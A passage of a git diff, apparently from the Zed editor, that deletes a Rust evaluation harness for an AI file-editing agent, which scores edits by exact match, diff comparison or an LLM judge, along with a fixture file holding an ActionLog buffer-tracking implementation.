raw_input: serde_json::to_string_pretty(&input).unwrap(), - input: serde_json::to_value(input).unwrap(), - is_input_complete: true, - thought_signature: None, - }) -} - -fn tool_result( - id: impl Into>, - name: impl Into>, - result: impl Into>, -) -> MessageContent { - MessageContent::ToolResult(LanguageModelToolResult { - tool_use_id: LanguageModelToolUseId::from(id.into()), - tool_name: name.into(), - is_error: false, - content: vec![LanguageModelToolResultContent::Text(result.into())], - output: None, - }) -} - -#[derive(Clone)] -struct EvalInput { - conversation: Vec, - edit_file_input: EditFileToolInput, - input_content: Option, - assertion: EvalAssertion, -} - -impl EvalInput { - fn from_conversation( - conversation: Vec, - input_content: Option, - assertion: EvalAssertion, - ) -> Self { - let msg = conversation.last().expect("Conversation must not be empty"); - if msg.role != Role::Assistant { - panic!("Conversation must end with an assistant message"); - } - let tool_use = msg - .content - .iter() - .flat_map(|content| match content { - MessageContent::ToolUse(tool_use) if tool_use.name == EditFileTool::NAME.into() => { - Some(tool_use) - } - _ => None, - }) - .next() - .expect("Conversation must end with an edit_file tool use") - .clone(); - - let edit_file_input: EditFileToolInput = serde_json::from_value(tool_use.input).unwrap(); - - EvalInput { - conversation, - edit_file_input, - input_content, - assertion, - } - } -} - -#[derive(Clone)] -struct EvalSample { - text_before: String, - text_after: String, - edit_output: EditAgentOutput, - diff: String, -} - -trait AssertionFn: 'static + Send + Sync { - fn assert<'a>( - &'a self, - sample: &'a EvalSample, - judge_model: Arc, - cx: &'a mut TestAppContext, - ) -> LocalBoxFuture<'a, Result>; -} - -impl AssertionFn for F -where - F: 'static - + Send - + Sync - + AsyncFn( - &EvalSample, - Arc, - &mut TestAppContext, - ) -> Result, -{ - fn assert<'a>( - &'a self, - sample: &'a EvalSample, - judge_model: Arc, - cx: &'a mut TestAppContext, - ) -> LocalBoxFuture<'a, Result> { - (self)(sample, judge_model, cx).boxed_local() - } -} - -#[derive(Clone)] -struct EvalAssertion(Arc); - -impl EvalAssertion { - fn new(f: F) -> Self - where - F: 'static - + Send - + Sync - + AsyncFn( - &EvalSample, - Arc, - &mut TestAppContext, - ) -> Result, - { - EvalAssertion(Arc::new(f)) - } - - fn assert_eq(expected: impl Into) -> Self { - let expected = expected.into(); - Self::new(async move |sample, _judge, _cx| { - Ok(EvalAssertionOutcome { - score: if strip_empty_lines(&sample.text_after) == strip_empty_lines(&expected) { - 100 - } else { - 0 - }, - message: None, - }) - }) - } - - fn assert_diff_any(expected_diffs: Vec>) -> Self { - let expected_diffs: Vec = expected_diffs.into_iter().map(Into::into).collect(); - Self::new(async move |sample, _judge, _cx| { - let matches = expected_diffs.iter().any(|possible_diff| { - let expected = - language::apply_diff_patch(&sample.text_before, possible_diff).unwrap(); - strip_empty_lines(&expected) == strip_empty_lines(&sample.text_after) - }); - - Ok(EvalAssertionOutcome { - score: if matches { 100 } else { 0 }, - message: None, - }) - }) - } - - fn judge_diff(assertions: &'static str) -> Self { - Self::new(async move |sample, judge, cx| { - let prompt = DiffJudgeTemplate { - diff: sample.diff.clone(), - assertions, - } - .render(&Templates::new()) - .unwrap(); - - let request = LanguageModelRequest { - messages: vec![LanguageModelRequestMessage { - role: Role::User, - content: vec![prompt.into()], - cache: false, - reasoning_details: None, - }], - thinking_allowed: true, - ..Default::default() - }; - let mut response = retry_on_rate_limit(async || { - Ok(judge - .stream_completion_text(request.clone(), &cx.to_async()) - .await?) - }) - .await?; - let mut output = String::new(); - while let Some(chunk) = response.stream.next().await { - let chunk = chunk?; - output.push_str(&chunk); - } - - // Parse the score from the response - let re = regex::Regex::new(r"(\d+)").unwrap(); - if let Some(captures) = re.captures(&output) - && let Some(score_match) = captures.get(1) - { - let score = score_match.as_str().parse().unwrap_or(0); - return Ok(EvalAssertionOutcome { - score, - message: Some(output), - }); - } - - anyhow::bail!("No score found in response. Raw output: {output}"); - }) - } - - async fn run( - &self, - input: &EvalSample, - judge_model: Arc, - cx: &mut TestAppContext, - ) -> Result { - self.0.assert(input, judge_model, cx).await - } -} - -fn run_eval(eval: EvalInput) -> eval_utils::EvalOutput { - let dispatcher = gpui::TestDispatcher::new(rand::random()); - let mut cx = TestAppContext::build(dispatcher, None); - let foreground_executor = cx.foreground_executor().clone(); - let result = foreground_executor.block_test(async { - let test = EditAgentTest::new(&mut cx).await; - test.eval(eval, &mut cx).await - }); - cx.quit(); - match result { - Ok(output) => eval_utils::EvalOutput { - data: output.to_string(), - outcome: if output.assertion.score < 80 { - eval_utils::OutcomeKind::Failed - } else { - eval_utils::OutcomeKind::Passed - }, - metadata: EditEvalMetadata { - tags: output.sample.edit_output.parser_metrics.tags, - mismatched_tags: output.sample.edit_output.parser_metrics.mismatched_tags, - }, - }, - Err(e) => eval_utils::EvalOutput { - data: format!("{e:?}"), - outcome: eval_utils::OutcomeKind::Error, - metadata: EditEvalMetadata { - tags: 0, - mismatched_tags: 0, - }, - }, - } -} - -#[derive(Clone)] -struct EditEvalOutput { - sample: EvalSample, - assertion: EvalAssertionOutcome, -} - -impl Display for EditEvalOutput { - fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { - writeln!(f, "Score: {:?}", self.assertion.score)?; - if let Some(message) = self.assertion.message.as_ref() { - writeln!(f, "Message: {}", message)?; - } - - writeln!(f, "Diff:\n{}", self.sample.diff)?; - - writeln!( - f, - "Parser Metrics:\n{:#?}", - self.sample.edit_output.parser_metrics - )?; - writeln!(f, "Raw Edits:\n{}", self.sample.edit_output.raw_edits)?; - Ok(()) - } -} - -struct EditAgentTest { - agent: EditAgent, - project: Entity, - judge_model: Arc, -} - -impl EditAgentTest { - async fn new(cx: &mut TestAppContext) -> Self { - cx.executor().allow_parking(); - - let fs = FakeFs::new(cx.executor()); - cx.update(|cx| { - settings::init(cx); - gpui_tokio::init(cx); - let http_client = Arc::new(ReqwestClient::user_agent("agent tests").unwrap()); - cx.set_http_client(http_client); - let client = Client::production(cx); - let user_store = cx.new(|cx| UserStore::new(client.clone(), cx)); - settings::init(cx); - language_model::init(cx); - RefreshLlmTokenListener::register(client.clone(), user_store.clone(), cx); - language_models::init(user_store, client.clone(), cx); - }); - - fs.insert_tree("/root", json!({})).await; - let project = Project::test(fs.clone(), [path!("/root").as_ref()], cx).await; - let agent_model = SelectedModel::from_str( - &std::env::var("ZED_AGENT_MODEL").unwrap_or("anthropic/claude-sonnet-4-latest".into()), - ) - .unwrap(); - let judge_model = SelectedModel::from_str( - &std::env::var("ZED_JUDGE_MODEL").unwrap_or("anthropic/claude-sonnet-4-latest".into()), - ) - .unwrap(); - - let authenticate_provider_tasks = cx.update(|cx| { - LanguageModelRegistry::global(cx).update(cx, |registry, cx| { - registry - .providers() - .iter() - .map(|p| p.authenticate(cx)) - .collect::>() - }) - }); - let (agent_model, judge_model) = cx - .update(|cx| { - cx.spawn(async move |cx| { - futures::future::join_all(authenticate_provider_tasks).await; - let agent_model = Self::load_model(&agent_model, cx).await; - let judge_model = Self::load_model(&judge_model, cx).await; - (agent_model.unwrap(), judge_model.unwrap()) - }) - }) - .await; - let action_log = cx.new(|_| ActionLog::new(project.clone())); - - let edit_format = EditFormat::from_env(agent_model.clone()).unwrap(); - - Self { - agent: EditAgent::new( - agent_model, - project.clone(), - action_log, - Templates::new(), - edit_format, - true, - true, - ), - project, - judge_model, - } - } - - async fn load_model( - selected_model: &SelectedModel, - cx: &mut AsyncApp, - ) -> Result> { - cx.update(|cx| { - let registry = LanguageModelRegistry::read_global(cx); - let provider = registry - .provider(&selected_model.provider) - .expect("Provider not found"); - provider.authenticate(cx) - }) - .await?; - Ok(cx.update(|cx| { - let models = LanguageModelRegistry::read_global(cx); - let model = models - .available_models(cx) - .find(|model| { - model.provider_id() == selected_model.provider - && model.id() == selected_model.model - }) - .unwrap_or_else(|| panic!("Model {} not found", selected_model.model.0)); - model - })) - } - - async fn eval(&self, mut eval: EvalInput, cx: &mut TestAppContext) -> Result { - // Make sure the last message in the conversation is cached. - eval.conversation.last_mut().unwrap().cache = true; - - let path = self - .project - .read_with(cx, |project, cx| { - project.find_project_path(eval.edit_file_input.path, cx) - }) - .unwrap(); - let buffer = self - .project - .update(cx, |project, cx| project.open_buffer(path, cx)) - .await - .unwrap(); - - let tools = crate::built_in_tools().collect::>(); - - let system_prompt = { - let worktrees = vec![WorktreeContext { - root_name: "root".to_string(), - abs_path: Path::new("/path/to/root").into(), - rules_file: None, - }]; - let project_context = ProjectContext::new(worktrees, Vec::default()); - let tool_names = tools - .iter() - .map(|tool| tool.name.clone().into()) - .collect::>(); - let template = crate::SystemPromptTemplate { - project: &project_context, - available_tools: tool_names, - model_name: None, - }; - let templates = Templates::new(); - template.render(&templates).unwrap() - }; - - let has_system_prompt = eval - .conversation - .first() - .is_some_and(|msg| msg.role == Role::System); - let messages = if has_system_prompt { - eval.conversation - } else { - [LanguageModelRequestMessage { - role: Role::System, - content: vec![MessageContent::Text(system_prompt)], - cache: true, - reasoning_details: None, - }] - .into_iter() - .chain(eval.conversation) - .collect::>() - }; - - let conversation = LanguageModelRequest { - messages, - tools, - thinking_allowed: true, - ..Default::default() - }; - - let edit_output = if matches!(eval.edit_file_input.mode, EditFileMode::Edit) { - if let Some(input_content) = eval.input_content.as_deref() { - buffer.update(cx, |buffer, cx| buffer.set_text(input_content, cx)); - } - retry_on_rate_limit(async || { - self.agent - .edit( - buffer.clone(), - eval.edit_file_input.display_description.clone(), - &conversation, - &mut cx.to_async(), - ) - .0 - .await - }) - .await? - } else { - retry_on_rate_limit(async || { - self.agent - .overwrite( - buffer.clone(), - eval.edit_file_input.display_description.clone(), - &conversation, - &mut cx.to_async(), - ) - .0 - .await - }) - .await? - }; - - let buffer_text = buffer.read_with(cx, |buffer, _| buffer.text()); - let sample = EvalSample { - edit_output, - diff: language::unified_diff( - eval.input_content.as_deref().unwrap_or_default(), - &buffer_text, - ), - text_before: eval.input_content.unwrap_or_default(), - text_after: buffer_text, - }; - let assertion = eval - .assertion - .run(&sample, self.judge_model.clone(), cx) - .await?; - - Ok(EditEvalOutput { assertion, sample }) - } -} - -async fn retry_on_rate_limit(mut request: impl AsyncFnMut() -> Result) -> Result { - const MAX_RETRIES: usize = 20; - let mut attempt = 0; - - loop { - attempt += 1; - let response = request().await; - - if attempt >= MAX_RETRIES { - return response; - } - - let retry_delay = match &response { - Ok(_) => None, - Err(err) => match err.downcast_ref::() { - Some(err) => match &err { - LanguageModelCompletionError::RateLimitExceeded { retry_after, .. } - | LanguageModelCompletionError::ServerOverloaded { retry_after, .. } => { - Some(retry_after.unwrap_or(Duration::from_secs(5))) - } - LanguageModelCompletionError::UpstreamProviderError { - status, - retry_after, - .. - } => { - // Only retry for specific status codes - let should_retry = matches!( - *status, - StatusCode::TOO_MANY_REQUESTS | StatusCode::SERVICE_UNAVAILABLE - ) || status.as_u16() == 529; - - if should_retry { - // Use server-provided retry_after if available, otherwise use default - Some(retry_after.unwrap_or(Duration::from_secs(5))) - } else { - None - } - } - LanguageModelCompletionError::ApiReadResponseError { .. } - | LanguageModelCompletionError::ApiInternalServerError { .. } - | LanguageModelCompletionError::HttpSend { .. } => { - // Exponential backoff for transient I/O and internal server errors - Some(Duration::from_secs(2_u64.pow((attempt - 1) as u32).min(30))) - } - _ => None, - }, - _ => None, - }, - }; - - if let Some(retry_after) = retry_delay { - let jitter = retry_after.mul_f64(rand::rng().random_range(0.0..1.0)); - eprintln!("Attempt #{attempt}: Retry after {retry_after:?} + jitter of {jitter:?}"); - // This code does not use the gpui::executor - #[allow(clippy::disallowed_methods)] - async_io::Timer::after(retry_after + jitter).await; - } else { - return response; - } - } -} - -#[derive(Clone, Debug, Eq, PartialEq, Hash)] -struct EvalAssertionOutcome { - score: usize, - message: Option, -} - -#[derive(Serialize)] -pub struct DiffJudgeTemplate { - diff: String, - assertions: &'static str, -} - -impl Template for DiffJudgeTemplate { - const TEMPLATE_NAME: &'static str = "diff_judge.hbs"; -} - -fn strip_empty_lines(text: &str) -> String { - text.lines() - .filter(|line| !line.trim().is_empty()) - .collect::>() - .join("\n") -} diff --git a/crates/agent/src/edit_agent/evals/fixtures/add_overwrite_test/before.rs b/crates/agent/src/edit_agent/evals/fixtures/add_overwrite_test/before.rs deleted file mode 100644 index 0d2a0be1fb889a..00000000000000 --- a/crates/agent/src/edit_agent/evals/fixtures/add_overwrite_test/before.rs +++ /dev/null @@ -1,1572 +0,0 @@ -use anyhow::{Context as _, Result}; -use buffer_diff::BufferDiff; -use collections::BTreeMap; -use futures::{StreamExt, channel::mpsc}; -use gpui::{App, AppContext, AsyncApp, Context, Entity, Subscription, Task, WeakEntity}; -use language::{Anchor, Buffer, BufferEvent, DiskState, Point, ToPoint}; -use project::{Project, ProjectItem, lsp_store::OpenLspBufferHandle}; -use std::{cmp, ops::Range, sync::Arc}; -use text::{Edit, Patch, Rope}; -use util::RangeExt; - -/// Tracks actions performed by tools in a thread -pub struct ActionLog { - /// Buffers that we want to notify the model about when they change. - tracked_buffers: BTreeMap, TrackedBuffer>, - /// Has the model edited a file since it last checked diagnostics? - edited_since_project_diagnostics_check: bool, - /// The project this action log is associated with - project: Entity, -} - -impl ActionLog { - /// Creates a new, empty action log associated with the given project. - pub fn new(project: Entity) -> Self { - Self { - tracked_buffers: BTreeMap::default(), - edited_since_project_diagnostics_check: false, - project, - } - } - - pub fn project(&self) -> &Entity { - &self.project - } - - /// Notifies a diagnostics check - pub fn checked_project_diagnostics(&mut self) { - self.edited_since_project_diagnostics_check = false; - } - - /// Returns true if any files have been edited since the last project diagnostics check - pub fn has_edited_files_since_project_diagnostics_check(&self) -> bool { - self.edited_since_project_diagnostics_check - } - - fn track_buffer_internal( - &mut self, - buffer: Entity, - is_created: bool, - cx: &mut Context, - ) -> &mut TrackedBuffer { - let tracked_buffer = self - .tracked_buffers - .entry(buffer.clone()) - .or_insert_with(|| { - let open_lsp_handle = self.project.update(cx, |project, cx| { - project.register_buffer_with_language_servers(&buffer, cx) - }); - - let text_snapshot = buffer.read(cx).text_snapshot(); - let diff = cx.new(|cx| BufferDiff::new(&text_snapshot, cx)); - let (diff_update_tx, diff_update_rx) = mpsc::unbounded(); - let base_text; - let status; - let unreviewed_changes; - if is_created { - base_text = Rope::default(); - status = TrackedBufferStatus::Created; - unreviewed_changes = Patch::new(vec![Edit { - old: 0..1, - new: 0..text_snapshot.max_point().row + 1, - }]) - } else { - base_text = buffer.read(cx).as_rope().clone(); - status = TrackedBufferStatus::Modified; - unreviewed_changes = Patch::default(); - } - TrackedBuffer { - buffer: buffer.clone(), - base_text, - unreviewed_changes, - snapshot: text_snapshot.clone(), - status, - version: buffer.read(cx).version(), - diff, - diff_update: diff_update_tx, - _open_lsp_handle: open_lsp_handle, - _maintain_diff: cx.spawn({ - let buffer = buffer.clone(); - async move |this, cx| { - Self::maintain_diff(this, buffer, diff_update_rx, cx) - .await - .ok(); - } - }), - _subscription: cx.subscribe(&buffer, Self::handle_buffer_event), - } - }); - tracked_buffer.version = buffer.read(cx).version(); - tracked_buffer - } - - fn handle_buffer_event( - &mut self, - buffer: Entity, - event: &BufferEvent, - cx: &mut Context, - ) { - match event { - BufferEvent::Edited { .. } => self.handle_buffer_edited(buffer, cx), - BufferEvent::FileHandleChanged => { - self.handle_buffer_file_changed(buffer, cx); - } - _ => {} - }; - } - - fn handle_buffer_edited(&mut self, buffer: Entity, cx: &mut Context) { - let Some(tracked_buffer) = self.tracked_buffers.get_mut(&buffer) else { - return; - }; - tracked_buffer.schedule_diff_update(ChangeAuthor::User, cx); - } - - fn handle_buffer_file_changed(&mut self, buffer: Entity, cx: &mut Context) { - let Some(tracked_buffer) = self.tracked_buffers.get_mut(&buffer) else { - return; - }; - - match tracked_buffer.status { - TrackedBufferStatus::Created | TrackedBufferStatus::Modified => { - if buffer - .read(cx) - .file() - .map_or(false, |file| file.disk_state() == DiskState::Deleted) - { - // If the buffer had been edited by a tool, but it got - // deleted externally, we want to stop tracking it. - self.tracked_buffers.remove(&buffer); - } - cx.notify(); - } - TrackedBufferStatus::Deleted => { - if buffer - .read(cx) - .file() - .map_or(false, |file| file.disk_state() != DiskState::Deleted) - { - // If the buffer had been deleted by a tool, but it got - // resurrected externally, we want to clear the changes we - // were tracking and reset the buffer's state. - self.tracked_buffers.remove(&buffer); - self.track_buffer_internal(buffer, false, cx); - } - cx.notify(); - } - } - } - - async fn maintain_diff( - this: WeakEntity, - buffer: Entity, - mut diff_update: mpsc::UnboundedReceiver<(ChangeAuthor, text::BufferSnapshot)>, - cx: &mut AsyncApp, - ) -> Result<()> { - while let Some((author, buffer_snapshot)) = diff_update.next().await { - let (rebase, diff, language, language_registry) = - this.read_with(cx, |this, cx| { - let tracked_buffer = this - .tracked_buffers - .get(&buffer) - .context("buffer not tracked")?; - - let rebase = cx.background_spawn({ - let mut base_text = tracked_buffer.base_text.clone(); - let old_snapshot = tracked_buffer.snapshot.clone(); - let new_snapshot = buffer_snapshot.clone(); - let unreviewed_changes = tracked_buffer.unreviewed_changes.clone(); - async move { - let edits = diff_snapshots(&old_snapshot, &new_snapshot); - if let ChangeAuthor::User = author { - apply_non_conflicting_edits( - &unreviewed_changes, - edits, - &mut base_text, - new_snapshot.as_rope(), - ); - } - (Arc::new(base_text.to_string()), base_text) - } - }); - - anyhow::Ok(( - rebase, - tracked_buffer.diff.clone(), - tracked_buffer.buffer.read(cx).language().cloned(), - tracked_buffer.buffer.read(cx).language_registry(), - )) - })??; - - let (new_base_text, new_base_text_rope) = rebase.await; - let diff_snapshot = BufferDiff::update_diff( - diff.clone(), - buffer_snapshot.clone(), - Some(new_base_text), - true, - false, - language, - language_registry, - cx, - ) - .await; - - let mut unreviewed_changes = Patch::default(); - if let Ok(diff_snapshot) = diff_snapshot { - unreviewed_changes = cx - .background_spawn({ - let diff_snapshot = diff_snapshot.clone(); - let buffer_snapshot = buffer_snapshot.clone(); - let new_base_text_rope = new_base_text_rope.clone(); - async move { - let mut unreviewed_changes = Patch::default(); - for hunk in diff_snapshot.hunks_intersecting_range( - Anchor::MIN..Anchor::MAX, - &buffer_snapshot, - ) { - let old_range = new_base_text_rope - .offset_to_point(hunk.diff_base_byte_range.start) - ..new_base_text_rope - .offset_to_point(hunk.diff_base_byte_range.end); - let new_range = hunk.range.start..hunk.range.end; - unreviewed_changes.push(point_to_row_edit( - Edit { - old: old_range, - new: new_range, - }, - &new_base_text_rope, - &buffer_snapshot.as_rope(), - )); - } - unreviewed_changes - } - }) - .await; - - diff.update(cx, |diff, cx| { - diff.set_snapshot(diff_snapshot, &buffer_snapshot, cx) - })?; - } - this.update(cx, |this, cx| { - let tracked_buffer = this - .tracked_buffers - .get_mut(&buffer) - .context("buffer not tracked")?; - tracked_buffer.base_text = new_base_text_rope; - tracked_buffer.snapshot = buffer_snapshot; - tracked_buffer.unreviewed_changes = unreviewed_changes; - cx.notify(); - anyhow::Ok(()) - })??; - } - - Ok(()) - } - - /// Track a buffer as read, so we can notify the model about user edits. - pub fn buffer_read(&mut self, buffer: Entity, cx: &mut Context) { - self.track_buffer_internal(buffer, false, cx); - } - - /// Mark a buffer as edited, so we can refresh it in the context - pub fn buffer_created(&mut self, buffer: Entity, cx: &mut Context) { - self.edited_since_project_diagnostics_check = true; - self.tracked_buffers.remove(&buffer); - self.track_buffer_internal(buffer.clone(), true, cx); - } - - /// Mark a buffer as edited, so we can refresh it in the context - pub fn buffer_edited(&mut self, buffer: Entity, cx: &mut Context) { - self.edited_since_project_diagnostics_check = true; - - let tracked_buffer = self.track_buffer_internal(buffer.clone(), false, cx); - if let TrackedBufferStatus::Deleted = tracked_buffer.status { - tracked_buffer.status = TrackedBufferStatus::Modified; - } - tracked_buffer.schedule_diff_update(ChangeAuthor::Agent, cx); - } - - pub fn will_delete_buffer(&mut self, buffer: Entity, cx: &mut Context) { - let tracked_buffer = self.track_buffer_internal(buffer.clone(), false, cx); - match tracked_buffer.status { - TrackedBufferStatus::Created => { - self.tracked_buffers.remove(&buffer); - cx.notify(); - } - TrackedBufferStatus::Modified => { - buffer.update(cx, |buffer, cx| buffer.set_text("", cx)); - tracked_buffer.status = TrackedBufferStatus::Deleted; - tracked_buffer.schedule_diff_update(ChangeAuthor::Agent, cx); - } - TrackedBufferStatus::Deleted => {} - } - cx.notify(); - } - - pub fn keep_edits_in_range( - &mut self, - buffer: Entity, - buffer_range: Range, - cx: &mut Context, - ) { - let Some(tracked_buffer) = self.tracked_buffers.get_mut(&buffer) else { - return; - }; - - match tracked_buffer.status { - TrackedBufferStatus::Deleted => { - self.tracked_buffers.remove(&buffer); - cx.notify(); - } - _ => { - let buffer = buffer.read(cx); - let buffer_range = - buffer_range.start.to_point(buffer)..buffer_range.end.to_point(buffer); - let mut delta = 0i32; - - tracked_buffer.unreviewed_changes.retain_mut(|edit| { - edit.old.start = (edit.old.start as i32 + delta) as u32; - edit.old.end = (edit.old.end as i32 + delta) as u32; - - if buffer_range.end.row < edit.new.start - || buffer_range.start.row > edit.new.end - { - true - } else { - let old_range = tracked_buffer - .base_text - .point_to_offset(Point::new(edit.old.start, 0)) - ..tracked_buffer.base_text.point_to_offset(cmp::min( - Point::new(edit.old.end, 0), - tracked_buffer.base_text.max_point(), - )); - let new_range = tracked_buffer - .snapshot - .point_to_offset(Point::new(edit.new.start, 0)) - ..tracked_buffer.snapshot.point_to_offset(cmp::min( - Point::new(edit.new.end, 0), - tracked_buffer.snapshot.max_point(), - )); - tracked_buffer.base_text.replace( - old_range, - &tracked_buffer - .snapshot - .text_for_range(new_range) - .collect::(), - ); - delta += edit.new_len() as i32 - edit.old_len() as i32; - false - } - }); - tracked_buffer.schedule_diff_update(ChangeAuthor::User, cx); - } - } - } - - pub fn reject_edits_in_ranges( - &mut self, - buffer: Entity, - buffer_ranges: Vec>, - cx: &mut Context, - ) -> Task> { - let Some(tracked_buffer) = self.tracked_buffers.get_mut(&buffer) else { - return Task::ready(Ok(())); - }; - - match tracked_buffer.status { - TrackedBufferStatus::Created => { - let delete = buffer - .read(cx) - .entry_id(cx) - .and_then(|entry_id| { - self.project - .update(cx, |project, cx| project.delete_entry(entry_id, false, cx)) - }) - .unwrap_or(Task::ready(Ok(()))); - self.tracked_buffers.remove(&buffer); - cx.notify(); - delete - } - TrackedBufferStatus::Deleted => { - buffer.update(cx, |buffer, cx| { - buffer.set_text(tracked_buffer.base_text.to_string(), cx) - }); - let save = self - .project - .update(cx, |project, cx| project.save_buffer(buffer.clone(), cx)); - - // Clear all tracked changes for this buffer and start over as if we just read it. - self.tracked_buffers.remove(&buffer); - self.buffer_read(buffer.clone(), cx); - cx.notify(); - save - } - TrackedBufferStatus::Modified => { - buffer.update(cx, |buffer, cx| { - let mut buffer_row_ranges = buffer_ranges - .into_iter() - .map(|range| { - range.start.to_point(buffer).row..range.end.to_point(buffer).row - }) - .peekable(); - - let mut edits_to_revert = Vec::new(); - for edit in tracked_buffer.unreviewed_changes.edits() { - let new_range = tracked_buffer - .snapshot - .anchor_before(Point::new(edit.new.start, 0)) - ..tracked_buffer.snapshot.anchor_after(cmp::min( - Point::new(edit.new.end, 0), - tracked_buffer.snapshot.max_point(), - )); - let new_row_range = new_range.start.to_point(buffer).row - ..new_range.end.to_point(buffer).row; - - let mut revert = false; - while let Some(buffer_row_range) = buffer_row_ranges.peek() { - if buffer_row_range.end < new_row_range.start { - buffer_row_ranges.next(); - } else if buffer_row_range.start > new_row_range.end { - break; - } else { - revert = true; - break; - } - } - - if revert { - let old_range = tracked_buffer - .base_text - .point_to_offset(Point::new(edit.old.start, 0)) - ..tracked_buffer.base_text.point_to_offset(cmp::min( - Point::new(edit.old.end, 0), - tracked_buffer.base_text.max_point(), - )); - let old_text = tracked_buffer - .base_text - .chunks_in_range(old_range) - .collect::(); - edits_to_revert.push((new_range, old_text)); - } - } - - buffer.edit(edits_to_revert, None, cx); - }); - self.project - .update(cx, |project, cx| project.save_buffer(buffer, cx)) - } - } - } - - pub fn keep_all_edits(&mut self, cx: &mut Context) { - self.tracked_buffers - .retain(|_buffer, tracked_buffer| match tracked_buffer.status { - TrackedBufferStatus::Deleted => false, - _ => { - tracked_buffer.unreviewed_changes.clear(); - tracked_buffer.base_text = tracked_buffer.snapshot.as_rope().clone(); - tracked_buffer.schedule_diff_update(ChangeAuthor::User, cx); - true - } - }); - cx.notify(); - } - - /// Returns the set of buffers that contain changes that haven't been reviewed by the user. - pub fn changed_buffers(&self, cx: &App) -> BTreeMap, Entity> { - self.tracked_buffers - .iter() - .filter(|(_, tracked)| tracked.has_changes(cx)) - .map(|(buffer, tracked)| (buffer.clone(), tracked.diff.clone())) - .collect() - } - - /// Iterate over buffers changed since last read or edited by the model - pub fn stale_buffers<'a>(&'a self, cx: &'a App) -> impl Iterator> { - self.tracked_buffers - .iter() - .filter(|(buffer, tracked)| { - let buffer = buffer.read(cx); - - tracked.version != buffer.version - && buffer - .file() - .map_or(false, |file| file.disk_state() != DiskState::Deleted) - }) - .map(|(buffer, _)| buffer) - } -} - -fn apply_non_conflicting_edits( - patch: &Patch, - edits: Vec>, - old_text: &mut Rope, - new_text: &Rope, -) { - let mut old_edits = patch.edits().iter().cloned().peekable(); - let mut new_edits = edits.into_iter().peekable(); - let mut applied_delta = 0i32; - let mut rebased_delta = 0i32; - - while let Some(mut new_edit) = new_edits.next() { - let mut conflict = false; - - // Push all the old edits that are before this new edit or that intersect with it. - while let Some(old_edit) = old_edits.peek() { - if new_edit.old.end < old_edit.new.start - || (!old_edit.new.is_empty() && new_edit.old.end == old_edit.new.start) - { - break; - } else if new_edit.old.start > old_edit.new.end - || (!old_edit.new.is_empty() && new_edit.old.start == old_edit.new.end) - { - let old_edit = old_edits.next().unwrap(); - rebased_delta += old_edit.new_len() as i32 - old_edit.old_len() as i32; - } else { - conflict = true; - if new_edits - .peek() - .map_or(false, |next_edit| next_edit.old.overlaps(&old_edit.new)) - { - new_edit = new_edits.next().unwrap(); - } else { - let old_edit = old_edits.next().unwrap(); - rebased_delta += old_edit.new_len() as i32 - old_edit.old_len() as i32; - } - } - } - - if !conflict { - // This edit doesn't intersect with any old edit, so we can apply it to the old text. - new_edit.old.start = (new_edit.old.start as i32 + applied_delta - rebased_delta) as u32; - new_edit.old.end = (new_edit.old.end as i32 + applied_delta - rebased_delta) as u32; - let old_bytes = old_text.point_to_offset(Point::new(new_edit.old.start, 0)) - ..old_text.point_to_offset(cmp::min( - Point::new(new_edit.old.end, 0), - old_text.max_point(), - )); - let new_bytes = new_text.point_to_offset(Point::new(new_edit.new.start, 0)) - ..new_text.point_to_offset(cmp::min( - Point::new(new_edit.new.end, 0), - new_text.max_point(), - )); - - old_text.replace( - old_bytes, - &new_text.chunks_in_range(new_bytes).collect::(), - ); - applied_delta += new_edit.new_len() as i32 - new_edit.old_len() as i32; - } - } -} - -fn diff_snapshots( - old_snapshot: &text::BufferSnapshot, - new_snapshot: &text::BufferSnapshot, -) -> Vec> { - let mut edits = new_snapshot - .edits_since::(&old_snapshot.version) - .map(|edit| point_to_row_edit(edit, old_snapshot.as_rope(), new_snapshot.as_rope())) - .peekable(); - let mut row_edits = Vec::new(); - while let Some(mut edit) = edits.next() { - while let Some(next_edit) = edits.peek() { - if edit.old.end >= next_edit.old.start { - edit.old.end = next_edit.old.end; - edit.new.end = next_edit.new.end; - edits.next(); - } else { - break; - } - } - row_edits.push(edit); - } - row_edits -} - -fn point_to_row_edit(edit: Edit, old_text: &Rope, new_text: &Rope) -> Edit { - if edit.old.start.column == old_text.line_len(edit.old.start.row) - && new_text - .chars_at(new_text.point_to_offset(edit.new.start)) - .next() - == Some('\n') - && edit.old.start != old_text.max_point() - { - Edit { - old: edit.old.start.row + 1..edit.old.end.row + 1, - new: edit.new.start.row + 1..edit.new.end.row + 1, - } - } else if edit.old.start.column == 0 - && edit.old.end.column == 0 - && edit.new.end.column == 0 - && edit.old.end != old_text.max_point() - { - Edit { - old: edit.old.start.row..edit.old.end.row, - new: edit.new.start.row..edit.new.end.row, - } - } else { - Edit { - old: edit.old.start.row..edit.old.end.row + 1, - new: edit.new.start.row..edit.new.end.row + 1, - } - } -} - -#[derive(Copy, Clone, Debug)] -enum ChangeAuthor { - User, - Agent, -} - -#[derive(Copy, Clone, Eq, PartialEq)] -enum TrackedBufferStatus { - Created, - Modified, - Deleted, -} - -struct TrackedBuffer { - buffer: Entity, - base_text: Rope, - unreviewed_changes: Patch, - status: TrackedBufferStatus, - version: clock::Global, - diff: Entity, - snapshot: text::BufferSnapshot, - diff_update: mpsc::UnboundedSender<(ChangeAuthor, text::BufferSnapshot)>, - _open_lsp_handle: OpenLspBufferHandle, - _maintain_diff: Task<()>, - _subscription: Subscription, -} - -impl TrackedBuffer { - fn has_changes(&self, cx: &App) -> bool { - self.diff - .read(cx) - .hunks(&self.buffer.read(cx), cx) - .next() - .is_some() - } - - fn schedule_diff_update(&self, author: ChangeAuthor, cx: &App) { - self.diff_update - .unbounded_send((author, self.buffer.read(cx).text_snapshot())) - .ok(); - } -} - -pub struct ChangedBuffer { - pub diff: Entity, -} - -#[cfg(test)] -mod tests { - use std::env; - - use super::*; - use buffer_diff::DiffHunkStatusKind; - use gpui::TestAppContext; - use language::Point; - use project::{FakeFs, Fs, Project, RemoveOptions}; - use rand::prelude::*; - use serde_json::json; - use settings::SettingsStore; - use util::{RandomCharIter, path}; - - #[ctor::ctor] - fn init_logger() { - zlog::init_test(); - } - - fn init_test(cx: &mut TestAppContext) { - cx.update(|cx| { - let settings_store = SettingsStore::test(cx); - cx.set_global(settings_store); - language::init(cx); - Project::init_settings(cx); - }); - } - - #[gpui::test(iterations = 10)] - async fn test_keep_edits(cx: &mut TestAppContext) { - init_test(cx); - - let fs = FakeFs::new(cx.executor()); - fs.insert_tree(path!("/dir"), json!({"file": 